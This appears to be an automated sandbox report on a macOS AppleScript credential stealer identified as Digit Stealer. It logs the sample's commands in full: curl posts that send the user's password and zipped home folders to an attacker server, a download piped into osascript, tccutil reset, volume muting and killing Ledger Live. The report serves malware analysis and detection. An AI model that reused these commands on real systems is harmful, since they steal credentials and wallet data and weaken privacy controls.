Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57998
Source: unknown	Network traffic detected: HTTP traffic on port 58017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58016
Source: unknown	Network traffic detected: HTTP traffic on port 58021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58027 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Mutes the volume using AppleScript likely to hide suspicious activity from the user

Source: /bin/bash (PID: 1820)

Mutes volume: osascript -e set volume with output muted

Jump to behavior

Source: classification engine

Classification label: mal88.troj.spyw.evad.macSCPT@0/28@5/0

Persistence and Installation Behavior

Terminates several processes with shell command 'killall'

Source: /bin/bash (PID: 1840)

Killall command executed: killall Ledger Live

Jump to behavior

Uploads files by emulating a filled-in form

Source: /bin/bash (PID: 1745)

Curl file upload using -F: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 3600 -F file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip -F hwid=53210679051327234f0b2e6abf37d5d7 -F wid=unknown -F user=jess https://goldenticketsshop.com/api/grabber

Jump to behavior

Source: /bin/bash (PID: 1703)

Hidden File created: /Users/jess/.53210679051327234f0b2e6abf37d5d7.txt

Jump to behavior

Source: /bin/bash (PID: 1676)	Osascript command executed: osascript payload_1_stealer.scpt	Jump to behavior
Source: /bin/bash (PID: 1818)	Osascript command executed: osascript	Jump to behavior
Source: /bin/bash (PID: 1820)	Osascript command executed: osascript -e set volume with output muted	Jump to behavior

Source: /usr/bin/osascript (PID: 1677)	Shell command executed: sh -c system_profiler SPHardwareDataType \| awk -F': ' '/Hardware UUID/ {print $2}' \| md5	Jump to behavior
Source: /bin/sh (PID: 1677)	Shell command executed: sh -c system_profiler SPHardwareDataType \| awk -F': ' '/Hardware UUID/ {print $2}' \| md5	Jump to behavior
Source: /usr/bin/osascript (PID: 1683)	Shell command executed: sh -c uuidgen	Jump to behavior
Source: /bin/sh (PID: 1683)	Shell command executed: sh -c uuidgen	Jump to behavior
Source: /usr/bin/osascript (PID: 1684)	Shell command executed: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' \| tr -d '\n' \| md5	Jump to behavior
Source: /bin/sh (PID: 1684)	Shell command executed: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' \| tr -d '\n' \| md5	Jump to behavior
Source: /usr/bin/osascript (PID: 1688)	Shell command executed: sh -c tail -n 1 /tmp/wid.txt	Jump to behavior
Source: /bin/sh (PID: 1688)	Shell command executed: sh -c tail -n 1 /tmp/wid.txt	Jump to behavior
Source: /usr/bin/osascript (PID: 1699)	Shell command executed: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'	Jump to behavior
Source: /bin/sh (PID: 1699)	Shell command executed: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'	Jump to behavior
Source: /usr/bin/osascript (PID: 1700)	Shell command executed: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &	Jump to behavior
Source: /bin/sh (PID: 1700)	Shell command executed: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &	Jump to behavior
Source: /usr/bin/osascript (PID: 1702)	Shell command executed: sh -c echo $HOME	Jump to behavior
Source: /bin/sh (PID: 1702)	Shell command executed: sh -c echo $HOME	Jump to behavior
Source: /usr/bin/osascript (PID: 1703)	Shell command executed: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'	Jump to behavior
Source: /bin/sh (PID: 1703)	Shell command executed: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'	Jump to behavior
Source: /usr/bin/osascript (PID: 1705)	Shell command executed: sh -c tccutil reset All	Jump to behavior
Source: /bin/sh (PID: 1705)	Shell command executed: sh -c tccutil reset All	Jump to behavior
Source: /usr/bin/osascript (PID: 1736)	Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop	Jump to behavior
Source: /bin/sh (PID: 1736)	Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop	Jump to behavior
Source: /usr/bin/osascript (PID: 1740)	Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents	Jump to behavior
Source: /bin/sh (PID: 1740)	Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents	Jump to behavior
Source: /usr/bin/osascript (PID: 1741)	Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads	Jump to behavior
Source: /bin/sh (PID: 1741)	Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads	Jump to behavior
Source: /usr/bin/osascript (PID: 1742)	Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes	Jump to behavior
Source: /bin/sh (PID: 1742)	Shell command executed: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes	Jump to behavior
Source: /usr/bin/osascript (PID: 1743)	Shell command executed: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75	Jump to behavior
Source: /bin/sh (PID: 1743)	Shell command executed: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75	Jump to behavior
Source: /usr/bin/osascript (PID: 1745)	Shell command executed: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber	Jump to behavior
Source: /bin/sh (PID: 1745)	Shell command executed: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber	Jump to behavior
Source: /usr/bin/osascript (PID: 1814)	Shell command executed: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75	Jump to behavior
Source: /bin/sh (PID: 1814)	Shell command executed: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75	Jump to behavior
Source: /usr/bin/osascript (PID: 1815)	Shell command executed: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'	Jump to behavior
Source: /bin/sh (PID: 1815)	Shell command executed: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'	Jump to behavior
Source: /usr/bin/osascript (PID: 1816)	Shell command executed: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' \| osascript >/dev/null 2>&1 &	Jump to behavior
Source: /bin/sh (PID: 1816)	Shell command executed: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' \| osascript >/dev/null 2>&1 &	Jump to behavior
Source: /usr/bin/osascript (PID: 1820)	Shell command executed: sh -c osascript -e 'set volume with output muted'	Jump to behavior
Source: /bin/sh (PID: 1820)	Shell command executed: sh -c osascript -e 'set volume with output muted'	Jump to behavior
Source: /usr/bin/osascript (PID: 1821)	Shell command executed: sh -c mkdir -p '/tmp/downloaded_parts'	Jump to behavior
Source: /bin/sh (PID: 1821)	Shell command executed: sh -c mkdir -p '/tmp/downloaded_parts'	Jump to behavior
Source: /usr/bin/osascript (PID: 1823)	Shell command executed: sh -c rm -f '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1823)	Shell command executed: sh -c rm -f '/tmp/app.asar.zip'	Jump to behavior
Source: /usr/bin/osascript (PID: 1824)	Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'	Jump to behavior
Source: /bin/sh (PID: 1824)	Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'	Jump to behavior
Source: /usr/bin/osascript (PID: 1825)	Shell command executed: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1825)	Shell command executed: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'	Jump to behavior
Source: /usr/bin/osascript (PID: 1827)	Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'	Jump to behavior
Source: /bin/sh (PID: 1827)	Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'	Jump to behavior
Source: /usr/bin/osascript (PID: 1831)	Shell command executed: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1831)	Shell command executed: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'	Jump to behavior
Source: /usr/bin/osascript (PID: 1833)	Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'	Jump to behavior
Source: /bin/sh (PID: 1833)	Shell command executed: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'	Jump to behavior
Source: /usr/bin/osascript (PID: 1835)	Shell command executed: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1835)	Shell command executed: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'	Jump to behavior
Source: /usr/bin/osascript (PID: 1837)	Shell command executed: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1837)	Shell command executed: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'	Jump to behavior
Source: /usr/bin/osascript (PID: 1839)	Shell command executed: sh -c killall 'Ledger Live' \|\| true	Jump to behavior
Source: /bin/sh (PID: 1839)	Shell command executed: sh -c killall 'Ledger Live' \|\| true	Jump to behavior

Source: /usr/bin/nohup (PID: 1701)	Curl executable: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials	Jump to behavior
Source: /bin/bash (PID: 1745)	Curl executable: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 3600 -F file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip -F hwid=53210679051327234f0b2e6abf37d5d7 -F wid=unknown -F user=jess https://goldenticketsshop.com/api/grabber	Jump to behavior
Source: /usr/bin/nohup (PID: 1817)	Curl executable: /usr/bin/curl -> curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx	Jump to behavior
Source: /bin/bash (PID: 1824)	Curl executable: /usr/bin/curl -> curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part1.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx	Jump to behavior
Source: /bin/bash (PID: 1827)	Curl executable: /usr/bin/curl -> curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part2.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx	Jump to behavior
Source: /bin/bash (PID: 1833)	Curl executable: /usr/bin/curl -> curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part3.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx	Jump to behavior

Source: /bin/bash (PID: 1736)	Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop	Jump to behavior
Source: /bin/bash (PID: 1740)	Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents	Jump to behavior
Source: /bin/bash (PID: 1741)	Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads	Jump to behavior
Source: /bin/bash (PID: 1742)	Mkdir executable: /bin/mkdir -> mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes	Jump to behavior
Source: /bin/bash (PID: 1821)	Mkdir executable: /bin/mkdir -> mkdir -p /tmp/downloaded_parts	Jump to behavior

Source: /bin/bash (PID: 1701)	Nohup executable: /usr/bin/nohup -> nohup curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials			Jump to behavior
Source: /bin/bash (PID: 1817)	Nohup executable: /usr/bin/nohup -> nohup curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx			Jump to behavior

Source: /bin/bash (PID: 1814)	Rm executable: /bin/rm -> rm -rf /tmp/a5b9845c461d901dad1363386bac5a75	Jump to behavior
Source: /bin/bash (PID: 1815)	Rm executable: /bin/rm -> rm -f /tmp/a5b9845c461d901dad1363386bac5a75.zip	Jump to behavior
Source: /bin/bash (PID: 1823)	Rm executable: /bin/rm -> rm -f /tmp/app.asar.zip	Jump to behavior

Source: /bin/bash (PID: 1683)

Uuidgen executable: /usr/bin/uuidgen -> uuidgen

Jump to behavior

Source: /bin/sh (PID: 1677)	Shell process: sh -c system_profiler SPHardwareDataType \| awk -F': ' '/Hardware UUID/ {print $2}' \| md5	Jump to behavior
Source: /bin/sh (PID: 1683)	Shell process: sh -c uuidgen	Jump to behavior
Source: /bin/sh (PID: 1684)	Shell process: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' \| tr -d '\n' \| md5	Jump to behavior
Source: /bin/sh (PID: 1688)	Shell process: sh -c tail -n 1 /tmp/wid.txt	Jump to behavior
Source: /bin/sh (PID: 1699)	Shell process: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'	Jump to behavior
Source: /bin/sh (PID: 1700)	Shell process: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &	Jump to behavior
Source: /bin/sh (PID: 1702)	Shell process: sh -c echo $HOME	Jump to behavior
Source: /bin/sh (PID: 1703)	Shell process: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'	Jump to behavior
Source: /bin/sh (PID: 1705)	Shell process: sh -c tccutil reset All	Jump to behavior
Source: /bin/sh (PID: 1736)	Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop	Jump to behavior
Source: /bin/sh (PID: 1740)	Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents	Jump to behavior
Source: /bin/sh (PID: 1741)	Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads	Jump to behavior
Source: /bin/sh (PID: 1742)	Shell process: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes	Jump to behavior
Source: /bin/sh (PID: 1743)	Shell process: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75	Jump to behavior
Source: /bin/sh (PID: 1745)	Shell process: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber	Jump to behavior
Source: /bin/sh (PID: 1814)	Shell process: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75	Jump to behavior
Source: /bin/sh (PID: 1815)	Shell process: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'	Jump to behavior
Source: /bin/sh (PID: 1816)	Shell process: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' \| osascript >/dev/null 2>&1 &	Jump to behavior
Source: /bin/sh (PID: 1820)	Shell process: sh -c osascript -e 'set volume with output muted'	Jump to behavior
Source: /bin/sh (PID: 1821)	Shell process: sh -c mkdir -p '/tmp/downloaded_parts'	Jump to behavior
Source: /bin/sh (PID: 1823)	Shell process: sh -c rm -f '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1824)	Shell process: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'	Jump to behavior
Source: /bin/sh (PID: 1825)	Shell process: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1827)	Shell process: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'	Jump to behavior
Source: /bin/sh (PID: 1831)	Shell process: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1833)	Shell process: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'	Jump to behavior
Source: /bin/sh (PID: 1835)	Shell process: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1837)	Shell process: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'	Jump to behavior
Source: /bin/sh (PID: 1839)	Shell process: sh -c killall 'Ledger Live' \|\| true	Jump to behavior

Source: /usr/bin/osascript (PID: 1676)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1818)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1820)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior

Source: /usr/bin/osascript (PID: 1676)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1676)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1818)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1818)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1820)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1820)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior

Source: /usr/bin/zip (PID: 1744)	ZIP file created: /private/tmp/a5b9845c461d901dad1363386bac5a75.zip	Jump to dropped file
Source: /usr/bin/zip (PID: 1744)	ZIP file created: /private/tmp/zixiNUg5	Jump to dropped file
Source: /usr/bin/curl (PID: 1824)	ZIP file created: /private/tmp/downloaded_parts/part1.aspx	Jump to dropped file
Source: /bin/bash (PID: 1826)	ZIP file created: /private/tmp/app.asar.zip	Jump to dropped file

Source: /bin/bash (PID: 1679)

Awk executable: /usr/bin/awk -> awk -F: /Hardware UUID/ {print $2}

Jump to behavior

Source: /System/Volumes/Preboot/Cryptexes/App/usr/libexec/AuthenticationServicesAgent (PID: 1659)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1676)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1818)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1820)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /System/Applications/System Settings.app/Contents/MacOS/System Settings (PID: 1753)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior

Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_BXLAzO/NotesIndexerState-Modern	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_dJVnzk/NotesIndexerState-HTML	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_031lUb/NotesIndexerState-Modern	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_JcqD2u/NotesIndexerState-HTML	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_Ht0qUQ/NotesIndexerState-HTML	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_JSAeuO/NotesIndexerState-HTML	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_GGD2MG/NotesIndexerState-HTML	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_8Nhm0A/NotesIndexerState-Modern	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_HUu32a/NotesIndexerState-Modern	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_oiZkwB/NotesIndexerState-Modern	Jump to dropped file
Source: /System/Applications/Notes.app/Contents/MacOS/Notes (PID: 1724)	XML plist file created: /Users/jess/Library/Containers/com.apple.Notes/Data/tmp/TemporaryItems/NSIRD_Notes_3nR46B/NotesIndexerState-Modern	Jump to dropped file

Lowering of HIPS / PFW / Operating System Security Settings

Clears all privacy permission grants using tccutil

Source: /bin/bash (PID: 1705)

Tccutil reset: /usr/bin/tccutil tccutil reset All

Jump to behavior

Source: /bin/bash (PID: 1705)

Tccutil executable: /usr/bin/tccutil tccutil reset All

Jump to behavior

Stealing of Sensitive Information

Exfiltrates password data via HTTP using curl

Source: /usr/bin/nohup (PID: 1701)

Curl exfiltrating password: /usr/bin/curl -> curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials

Jump to behavior

Kills crypto wallet applications indicative for crypto stealers

Source: /bin/bash (PID: 1840)

Kills crypto wallet processes: killall Ledger Live

Jump to behavior

Yara detected Digit Stealer

Source: Yara match

File source: payload_1_stealer.scpt, type: SAMPLE

Executes the "dscl" command with authonly argument (probably to verify the login password)

Source: /bin/bash (PID: 1699)

Security executable: /usr/bin/dscl /usr/bin/dscl /Local/Default -authonly jess 123456

Jump to behavior

Writes files containing the user's password

Source: /bin/bash (PID: 1703)

Default password detected: /Users/jess/.53210679051327234f0b2e6abf37d5d7.txt

Jump to dropped file

Source: /bin/bash (PID: 1678)	System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType			Jump to behavior
Source: /usr/sbin/system_profiler (PID: 1681)	System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full			Jump to behavior

Remote Access Functionality

Yara detected Digit Stealer

Source: Yara match

File source: payload_1_stealer.scpt, type: SAMPLE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Scripting	Path Interception	11 Impair Defenses	1 Unsecured Credentials	1 Account Discovery	Remote Services	Data from Local System	1 Encrypted Channel	1 Exfiltration Over Alternative Protocol	1 Service Stop
Credentials	Domains	Default Accounts	3 AppleScript	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Indicator Blocking	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	1 Exfiltration Over Web Service	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Name	IP	Active	Malicious	Reputation
h3.media.apple.map.fastly.net	146.75.123.6	true	false	high
icloud.com	17.253.144.10	true	false	high
67e5143a9ca7d2240c137ef80f2641d6.pages.dev	188.114.97.3	true	false	unknown
goldenticketsshop.com	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://goldenticketsshop.com	payload_1_stealer.scpt	true		unknown
https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx	payload_1_stealer.scpt	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
146.75.123.6	h3.media.apple.map.fastly.net	Sweden		30051	SCCGOVUS	false
188.114.97.3	67e5143a9ca7d2240c137ef80f2641d6.pages.dev	European Union		13335	CLOUDFLARENETUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	tuAIi63dSK.exe	Get hash	malicious	Azorult, GuLoader	Browse	k1n4a.online/HL341/index.php
	PT CPI Vendor quotation request.exe	Get hash	malicious	FormBook	Browse	www.tgwfj.xyz/b5fo/
	rPurchaseEnquiry.exe	Get hash	malicious	FormBook	Browse	www.sld6.rest/q0rl/
